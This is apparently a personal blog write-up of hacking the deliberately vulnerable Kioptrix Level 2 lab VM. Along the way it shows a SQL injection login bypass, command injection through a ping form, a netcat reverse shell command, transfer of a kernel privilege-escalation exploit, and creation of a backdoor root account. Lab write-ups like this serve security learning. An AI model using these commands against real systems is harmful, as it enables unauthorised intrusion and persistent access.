Hacking Kioptrix Level 2

Hi guys! It has been more than a month since I managed to get into Kioptrix Level 1. June was a bit hectic but here’s what I found out with Kioptrix Level 2. The following are the things that you’ll need:

Spoiler alert! If you’re trying to practice hacking in a controlled environment, I suggest downloading Kioptrix Level 2 or any other vulnerable machine from VulnHub, close this page, and do your own attack. Come back if you’re a bit lost or just need a guide.

I won’t be discussing how you can setup your virtual environment here. You just need to install Kali and Kioptrix Level 2 then you’re ready. Please note that we have Kali and Kioptrix in the same local network. Boot up Kioptrix Level 2 and you’ll be welcomed with this screen:

The goal of the exercise is the same with the previous level. We need to acquire a “root” access. At this point, we should also start Kali so there are currently two instances of VMWare (I’m using this instead of Virtual Box).

To start off, we should first identify the current local area network. In Kali, open the terminal and type in “ifconfig”. You should get a similar result like this:

The IP address of my Kali machine is 192.168.209.139 and the subnet mask is 255.255.255.0 (/24). This means that the IP address of Kioptrix should be 192.168.209.X given that X is a number between 0 and 255. We can actually find out its IP address together with the services running through nmap by typing in the command “nmap 192.168.209.0/24”. Notice that a few results popped up and a host having an IP address of 192.168.209.137 seems interesting.

We can also do another scan specific to this IP address to show the version of the services running by typing in:

nmap -sV 192.168.209.137

By the results shown, we get a more detailed report on what specific versions of services are running in Kioptrix. Seeing that it has the service “http” running on TCP port 80, we can fire up our browser and type in “192.168.209.137”.

Interestingly, a login page is presented. At first glance, we can try a few default login credentials like:

admin:1234
admin:12345
admin:123456
admin:1234567
admin:12345678
admin:123456789
admin:1234567890
admin:admin
admin:pass
admin:password

but not one made it through so I thought about trying out SQL injection. By entering “admin” as the username and an SQL code in the password, we might get access.

To review, a very basic SQL statement to check a username and password combination could be as follow:

SELECT * FROM USERS WHERE username = ‘$ENTERED_USERNAME’ AND password = ‘$ENTERED_PASSWORD’;

Since I have assumed the username to be “admin”, the format will be as follow:

SELECT * FROM USERS WHERE username = ‘admin’ AND password = ‘$ENTERED_PASSWORD’;

For the password, based from the format given above, we can enter:

‘ OR ‘1’ = ‘1

This way, the SQL statement will be:

SELECT * FROM USERS WHERE username = ‘admin’ AND password = ” OR ‘1’ = ‘1’;

To prevent confusion on what our injected code is, notice the single quotes that represent part of the real statement.

By clicking the login button, we somehow got in!

Please note that I just got lucky with the SQL code. Consider having a lot of cases. Another example is like the one below:

SELECT * FROM USERS WHERE username = “$ENTERED_USERNAME” AND password = “$ENTERED_PASSWORD”;

In that statement, it’s using a double quote instead of a single one. Just keep in mind other code syntax.

At this point, I entered the IP address of my Kali VM in the input box as the page seem to be a “ping” tool.

The result of this input is the following:

I noticed that the output is somehow the same of when we do a ping through a local terminal so the next step would be playing with the input.

By entering the same IP address with a semicolon and “ls” (Command to list files and directories).

We will get a result of:

Notice that we got index.php and pingit.php shown after the ping results. This technically means the webpage is vulnerable to code injection because we can manipulate the code.

By typing in the command:

;pwd

We can actually get the current path of the website in Kioptrix.

 

A lot more can be done but the question is, how can we leverage this vulnerability to get an easier access through a terminal? The answer would be letting it connect to our Kali VM!

In this part, I’ll be using Netcat to create a reverse shell so we can use Kioptrix’s shell through Kali. You can read more about Netcat here.

By using the “find” command, we will be able to check if nc.exe (Netcat) is present in Kioptrix.

Luckily, it’s available!

Next is to find the bash binary in Kioptrix. We can still use the “find” command:

We then get the path:

At this time, let’s get back to Kali and type the command:

nc -lvp 7777

nc = netcat
-l = listen mode, for inbound connects (Because we will let Kioptrix connect to Kali)
-v = verbose (To see the status)
-p = port to be used

Once the listening starts, let’s type in a command in the website:

;/usr/local/bin/nc -nv 192.168.209.139 7777 -e /bin/bash

What this does is let Kioptrix’s Netcat connect to 192.168.209.139 (Our Kali VM) at port 7777 and present Kioptrix’s bash.

Once we click “submit” on the website, we will get this result in Kali:

Now we have a shell access to Kioptrix! We can pretty much do things like “ls”, “cat”, navigate through folders and many other more however, after a few commands, it appears that we don’t have root access yet.

Shown in the picture above are commands (With the red arrow) and the results are presented right after. Notice in the yellow box that navigating to the root folder gives a permission denied statement.

Since we have a shell access to the machine without administrator privileges, we can probably do privilege escalation using known vulnerabilities.

By typing in the command:

uname -a

We will get the operating system together with the kernel version.

Note that the kernel version for this Linux build is “2.6.9-55.EL” so let’s try to find a privilege escalation for this.

 

The first result in this case seems interesting. It’s a Linux Kernel 2.6 < 2.6.19 Ring0 Privilege Escalation Exploit.

Initially, I downloaded this in Kali and compiled it using GCC with the command:

gcc 9542.c -o 9542

Then, I transferred the executable to Kioptrix using Netcat but when I ran the executable, I somehow got a floating point exception and then it struck me. Kali and Kioptrix were not the same! This means the GCC installed in Kali is configured for Kali by default and not for Kioptrix’s build. So at this point, I had to check if GCC was available in Kioptrix and it was!

Now let’s transfer the C source code to Kioptrix through Netcat. In Kali, we should listen for incoming connections and once a device connects, throw back the 9542.c (Our privilege escalation exploit source code).

Type in:

nc -lvp 5555 < /root/Desktop/9542.c

I have 9542.c in the Desktop so make sure you have the correct path. Next is having Kioptrix connect. Do note that since we have no root privileges, some directories are not accessible so I thought about navigating to the “tmp” folder in Kioptrix before doing the transfer.

Type in:

cd /tmp
/usr/local/bin/nc -nv 192.168.209.139 5555 > exploit.c

After a few seconds, kill the connection in Kali by closing the file transfer terminal and double check if the file has been transferred successfully through the Kioptrix shell. You should be getting an output similar to this:

To compile this exploit, type in:

gcc exploit.c -o exploit

To make it executable, type in:

chmod +x exploit

Then run it:

./exploit

To check if it works, type in:

id

You’ll be presented with a root account!

Since we already have root access, the next thing to do will be creating a backdoor account with root privileges. To do this, we will use the “adduser” command.

Type in:

adduser rootbackdoor
passwd rootbackdoor

It will then ask for an account password. Enter anything that you like. I entered “kioptrix2”.

We should then add the account to the root group by entering the command:

usermod -aG root rootbackdoor

Finally, we try the account in Kioptrix:

It’s a success!

Things to note:

  • The SQL injection and code injection presented in this post are not the only methods to get into Kioptrix.
  • I haven’t scanned the UDP ports in Kioptrix. This may show more vulnerable services that could be exploited.

I’ll be downloading Kioptrix Level 3 and work on how to get access. Expect another post soon!

Leave a Reply

Your email address will not be published. Required fields are marked *